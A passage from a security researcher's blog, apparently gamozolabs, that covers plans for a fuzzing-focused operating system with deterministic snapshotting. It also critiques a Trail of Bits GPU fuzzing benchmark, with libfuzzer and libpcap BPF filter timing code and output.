<p>As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.</p>
<h3 id="fast-and-differential-memory-snapshotting">Fast and differential memory snapshotting</h3>
<p>So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure; rather, I’ve used them as needed manually. I plan to make the core of this operating system a combination of Rust procedural macros and virtual memory management tricks to allow for arbitrary data structures to be stored in a tree-shaped checkpointed structure.</p>
<p>This will allow for fast transitions between different states of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want, device state, guest memory state, register state, something completely unrelated to fuzzing, won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.</p>
<p>Effectively, we’re going to heavily leverage the hardware’s MMU to differentally snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.</p>
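<p>A toy model of differential snapshotting may make the idea concrete. Here the hardware page-table dirty bits are replaced by a software-maintained dirty list, but the principle is the same: a restore only touches the pages a fuzz case actually wrote, not all of memory. This is a sketch for illustration, not the real MMU-backed implementation:</p>

```rust
const PAGE_SIZE: usize = 4096;

// A toy model of differential snapshotting: instead of hardware
// page-table dirty bits, dirtied pages are tracked in software.
// Restores only copy back the pages that were actually written.
struct SnapshottedMemory {
    memory:   Vec<u8>,
    snapshot: Vec<u8>,
    dirty:    Vec<usize>, // indices of dirtied pages
}

impl SnapshottedMemory {
    fn new(size: usize) -> Self {
        let memory = vec![0u8; size];
        Self { snapshot: memory.clone(), memory, dirty: Vec::new() }
    }

    // Write to memory, recording the dirtied page (the hardware MMU
    // would record this for us via dirty bits in the page tables)
    fn write(&mut self, addr: usize, val: u8) {
        let page = addr / PAGE_SIZE;
        if !self.dirty.contains(&page) {
            self.dirty.push(page);
        }
        self.memory[addr] = val;
    }

    // Restore only the dirtied pages back to the snapshot state
    fn restore(&mut self) {
        for &page in &self.dirty {
            let start = page * PAGE_SIZE;
            self.memory[start..start + PAGE_SIZE]
                .copy_from_slice(&self.snapshot[start..start + PAGE_SIZE]);
        }
        self.dirty.clear();
    }
}

fn main() {
    let mut mem = SnapshottedMemory::new(16 * PAGE_SIZE);
    mem.write(0x1234, 0x41);
    assert_eq!(mem.memory[0x1234], 0x41);
    mem.restore(); // only 1 page is copied back, not all 16
    assert_eq!(mem.memory[0x1234], 0);
    assert!(mem.dirty.is_empty());
    println!("differential restore ok");
}
```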
<h3 id="linux-emulator">Linux emulator</h3>
<p>Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.</p>
<p>This means that we’ll be able to (probably statically only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, and we’ll scale better, and we’ll blow Linux away when it comes to memory management.</p>
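<p>The determinism idea can be sketched in a few lines. In this toy model, the emulated Linux layer never consults real hardware for time or entropy: a “clock” derived purely from the number of syscalls serviced, and a fixed-seed PRNG, mean two identical runs observe byte-identical syscall results. The names here are made up for illustration and are not the real syscall interface:</p>

```rust
// Toy deterministic syscall layer: no real time, no real entropy.
struct DeterministicKernel {
    syscalls_serviced: u64,
}

impl DeterministicKernel {
    fn new() -> Self { Self { syscalls_serviced: 0 } }

    // clock_gettime equivalent: time advances a fixed amount per
    // syscall, never from the host's real clock
    fn sys_clock_gettime(&mut self) -> u64 {
        self.syscalls_serviced += 1;
        self.syscalls_serviced * 1_000 // fake nanoseconds per syscall
    }

    // getrandom equivalent: a fixed-seed xorshift, so "random" bytes
    // are identical on every run
    fn sys_getrandom(&mut self, buf: &mut [u8]) {
        self.syscalls_serviced += 1;
        let mut state = 0x1234_5678u64 ^ self.syscalls_serviced;
        for b in buf.iter_mut() {
            state ^= state << 13;
            state ^= state >> 7;
            state ^= state << 17;
            *b = state as u8;
        }
    }
}

fn main() {
    // Two independent "boots" observe byte-identical syscall results
    let (mut a, mut b) = (DeterministicKernel::new(), DeterministicKernel::new());
    let (mut buf_a, mut buf_b) = ([0u8; 16], [0u8; 16]);
    a.sys_getrandom(&mut buf_a);
    b.sys_getrandom(&mut buf_b);
    assert_eq!(buf_a, buf_b);
    assert_eq!(a.sys_clock_gettime(), b.sys_clock_gettime());
    println!("deterministic ok");
}
```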
<h3 id="kvm-emulator--hypervisor">KVM emulator + hypervisor</h3>
<p>So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!</p>
<p>This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.</p>
<h2 id="thats-it">That’s it</h2>
<p>So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D</p>
<h2 id="faq">FAQ</h2>
<p>Some people have asked questions on the internet, and I’ll post them here:</p>
<h3 id="hackernews-q1">Hackernews Q1</h3>
<p>Q:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).
Of course, writing an OS can be its own reward, too:)
</code></pre></div></div>
<p>A:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.
But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.
To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls to `call` instructions. This means a "syscall" is just a call to another area, which will by my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())
The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.
While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.
But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.
All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU with get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisior. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.
In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.
Stay cute, ~gamozo
</code></pre></div></div>
<hr />
<h2 id="social">Social</h2>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<h1 id="some-thoughts-on-tobs-gpu-based-fuzzing"><a href="https://gamozolabs.github.io/2020/10/23/some_thoughts_on_gpu_fuzzing">Some thoughts on ToB’s GPU-based fuzzing</a> (2020-10-23)</h1>
<h2 id="the-blog">The blog</h2>
<p>The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!</p>
<p><a href="https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/">Let’s build a high-performance fuzzer with GPUs!</a></p>
<h2 id="summary">Summary</h2>
<p>In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called <a href="https://github.com/lifting-bits/remill">remill</a>, which is designed for binary translation. Remill alone is incredibly impressive.</p>
<p>The target they picked as a benchmark is the BFP packet filtering code in libpcap, <a href="https://github.com/the-tcpdump-group/libpcap/blob/505e35489a11a8dbbd5e3909e587608b7903eb5b/bpf_filter.c#L75"><code class="language-plaintext highlighter-rouge">pcap_filter_with_aux_data</code></a>. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.</p>
<p>The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handling virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!</p>
<p>I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.</p>
<hr />
<h2 id="the-problems">The Problems</h2>
<p>Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.</p>
<h1 id="the-comparison">The comparison</h1>
<p>In the blog, the comparison being done and being presented is largely about comparing the performance of <a href="https://www.llvm.org/docs/LibFuzzer.html">libfuzzer</a>, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.</p>
<p>The hardware they’re testing on are 2 different Google Cloud Compute nodes which have various specs. The one used to benchmark libfuzzer is an <code class="language-plaintext highlighter-rouge">n1-standard-8</code>: a 4-core, 8-hyperthread Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.</p>
<p>The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.</p>
<p>In their blog, they mention that “This isn’t an entirely fair comparison.”, largely referring to the fact that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any persistent state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there are a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. It is also important to note that the blog concludes with a ~4x improvement over libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.</p>
<p>Of course, if you’ve read my blogs before. You’ll know I absolutely hate comparisons between problems with multiple variables. First of all, mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing at first glance, but we’ll look into this more later.</p>
<p>So, let’s start off by eliminating one variable right away. What <em>is</em> the cost of generating an input from libfuzzer, and what is the cost of the actual function under test. This will effectively tell us how “fair” the execution comparison is, the binary vs source is subjective and clearly the binary-based engine is more impressive.</p>
<p>How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdint.h>
</span>
<span class="k">extern</span> <span class="kt">int</span> <span class="nf">LLVMFuzzerTestOneInput</span><span class="p">(</span><span class="k">const</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">Data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">Size</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// Non-zero return values are reserved for future use.</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>clang-12 <span class="nt">-fsanitize</span><span class="o">=</span>fuzzer <span class="nt">-O2</span> test.c
</code></pre></div></div>
<p>We’ll run this test on a <code class="language-plaintext highlighter-rouge">Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz</code> turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.</p>
<p>They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1),
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850),
INFO: A corpus is not provided, starting from an empty corpus
#2 INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728 pulse cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb
</code></pre></div></div>
<p>Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.</p>
<p>Next, lets see how expensive the target code is outside of libfuzzer.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="n">Instant</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">pcap_sys</span><span class="p">::</span><span class="o">*</span><span class="p">;</span>
<span class="nd">#[link(name</span> <span class="nd">=</span> <span class="s">"pcap"</span><span class="nd">)]</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">pc</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="n">bpf_insn</span><span class="p">,</span>
<span class="n">p</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="n">wirelen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buflen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">aux_data</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">ITERS</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">100_000_000</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program</span><span class="p">:</span> <span class="n">bpf_program</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">();</span>
<span class="c">// Ethernet linktype + 1500 snapshot length</span>
<span class="k">let</span> <span class="n">pcap</span> <span class="o">=</span> <span class="nf">pcap_open_dead</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1500</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">!</span><span class="n">pcap</span><span class="nf">.is_null</span><span class="p">());</span>
<span class="c">// Compile the program</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">pcap_compile</span><span class="p">(</span><span class="n">pcap</span><span class="p">,</span> <span class="o">&</span><span class="k">mut</span> <span class="n">program</span><span class="p">,</span>
<span class="s">"dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or </span><span class="err">\</span><span class="s">
atalk or aarp or decnet or iso or stp or ipx</span><span class="se">\0</span><span class="s">"</span>
<span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="mi">_</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span> <span class="n">PCAP_NETMASK_UNKNOWN</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Failed to compile pcap thingy"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">buf</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">1500</span><span class="p">];</span>
<span class="k">let</span> <span class="n">time</span> <span class="o">=</span> <span class="nn">Instant</span><span class="p">::</span><span class="nf">now</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">ITERS</span> <span class="p">{</span>
<span class="c">// Filter a packet</span>
<span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">program</span><span class="py">.bf_insns</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.as_ptr</span><span class="p">(),</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null</span><span class="p">()</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">let</span> <span class="n">elapsed</span> <span class="o">=</span> <span class="n">time</span><span class="nf">.elapsed</span><span class="p">()</span><span class="nf">.as_secs_f64</span><span class="p">();</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"{:14.2} packets/second</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ITERS</span> <span class="k">as</span> <span class="nb">f64</span> <span class="o">/</span> <span class="n">elapsed</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We’re just going to compile the filter they mention in their blog, and then call <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using <code class="language-plaintext highlighter-rouge">libpcap-1.9.1</code> as distributed as a source code zip, this may differ slightly from their version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
Finished release [optimized] target(s) in 0.01s
Running `target/release/harness`
18703628.46 packets/second
</code></pre></div></div>
<p>Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.</p>
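<p>Making the arithmetic explicit with the rough single-core numbers measured above:</p>

```rust
fn main() {
    // Rough single-core numbers measured above
    let target_per_sec    = 18_703_628.0; // bare bpf_filter_with_aux_data loop
    let libfuzzer_per_sec =  3_120_000.0; // libfuzzer running an empty target

    // Cost of one fuzz case in nanoseconds
    let target_ns    = 1e9 / target_per_sec;    // ~53ns of actual target code
    let libfuzzer_ns = 1e9 / libfuzzer_per_sec; // ~320ns of pure harness overhead

    // libfuzzer pays roughly 6x the cost of the target before the
    // target even runs a single instruction
    let penalty = libfuzzer_ns / target_ns;
    println!("target {:.0}ns, harness {:.0}ns, penalty {:.1}x",
        target_ns, libfuzzer_ns, penalty);
    assert!(penalty > 5.9 && penalty < 6.1);
}
```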
<p>This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.</p>
<h1 id="trying-to-make-the-comparison-closer">Trying to make the comparison closer</h1>
<p>I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. <strong>It’s important to note, from this point on, this comparison is for <em>myself</em>. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance.</strong> I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.</p>
<p>So, to start off, I’m going to compare the GPU fuzzer against my <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">vectorized emulation</a>. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.</p>
<p>Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.</p>
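<p>The lane arithmetic above can be modeled in a few lines. This is a toy scalar model of the concept only, using an array in place of an actual AVX-512 register; the real implementation JITs guest instructions into genuine vector instructions:</p>

```rust
// One "guest instruction" is applied across 8 VM lanes at once
// (AVX-512 provides 512 bits, or 8 x 64-bit lanes per operation).
const LANES: usize = 512 / 64; // 8 VMs per hardware thread

// Model of a vectorized add across all lanes' register state
fn vector_add(dst: &mut [u64; LANES], src: &[u64; LANES]) {
    for lane in 0..LANES {
        dst[lane] = dst[lane].wrapping_add(src[lane]);
    }
}

fn main() {
    // 8 VMs execute the same add against diverging register state
    let mut regs = [0u64, 1, 2, 3, 4, 5, 6, 7];
    let imm = [10u64; LANES];
    vector_add(&mut regs, &imm);
    assert_eq!(regs, [10, 11, 12, 13, 14, 15, 16, 17]);
    println!("8 lanes per thread ok");
}
```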
<p>Let’s try it!</p>
<h1 id="the-environment">The environment</h1>
<p>To try to get as close to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there are no specifics about what they used as an input, so we’re making the assumption that using a 1500-byte zeroed-out input, simply invoking <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code>, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Given how many <code class="language-plaintext highlighter-rouge">or</code> conditions are used in the filter, and that the packet doesn’t match any of them, we should be seeing the <em>worst</em> case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was <code class="language-plaintext highlighter-rouge">1.2.3.4</code>, I’d suspect the performance would be improved. Without this being clarified in the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).</p>
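<p>The worst-case intuition can be sketched abstractly. In this toy model of a filter built from or’d predicates with short-circuit evaluation, a matching packet exits after the first hit, while a non-matching packet pays for every predicate. The predicates here are invented for illustration and have nothing to do with the actual compiled BPF program:</p>

```rust
// Evaluate an or-of-predicates filter with short-circuit semantics,
// returning the verdict and how many predicates were evaluated.
fn evaluate(packet: &[u8], predicates: &[fn(&[u8]) -> bool]) -> (bool, usize) {
    let mut evaluated = 0;
    for pred in predicates {
        evaluated += 1;
        if pred(packet) {
            return (true, evaluated); // early exit on a match
        }
    }
    (false, evaluated) // a miss evaluates everything
}

fn main() {
    // Hypothetical predicates, standing in for "dst host 1.2.3.4 or
    // tcp or udp or ..." in the real filter
    let preds: Vec<fn(&[u8]) -> bool> = vec![
        |p| p.get(0) == Some(&0x45), // pretend "is IPv4" check
        |p| p.len() > 2000,          // pretend size check
        |p| p.iter().any(|&b| b != 0),
    ];
    // All-zero 1500-byte packet: misses, so all 3 predicates run
    assert_eq!(evaluate(&[0u8; 1500], &preds), (false, 3));
    // Matching packet: exits after the first predicate
    assert_eq!(evaluate(&[0x45], &preds), (true, 1));
    println!("worst case is a full miss");
}
```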
<p>Anyways, the target code that I’m using is as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="n">Instant</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">pcap_sys</span><span class="p">::</span><span class="o">*</span><span class="p">;</span>
<span class="nd">#[link(name</span> <span class="nd">=</span> <span class="s">"pcap"</span><span class="nd">)]</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">pc</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="n">bpf_insn</span><span class="p">,</span>
<span class="n">p</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="n">wirelen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buflen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">aux_data</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="nd">#[no_mangle]</span>
<span class="k">pub</span> <span class="k">extern</span> <span class="k">fn</span> <span class="nf">fuzz_external</span><span class="p">()</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">ITERS</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program</span><span class="p">:</span> <span class="n">bpf_program</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">();</span>
<span class="c">// Ethernet linktype + 1500 snapshot length</span>
<span class="k">let</span> <span class="n">pcap</span> <span class="o">=</span> <span class="nf">pcap_open_dead</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1500</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">!</span><span class="n">pcap</span><span class="nf">.is_null</span><span class="p">());</span>
<span class="c">// Compile the program</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">pcap_compile</span><span class="p">(</span><span class="n">pcap</span><span class="p">,</span> <span class="o">&</span><span class="k">mut</span> <span class="n">program</span><span class="p">,</span>
<span class="s">"dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or </span><span class="err">\</span><span class="s">
atalk or aarp or decnet or iso or stp or ipx</span><span class="se">\0</span><span class="s">"</span>
<span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="mi">_</span><span class="p">,</span>
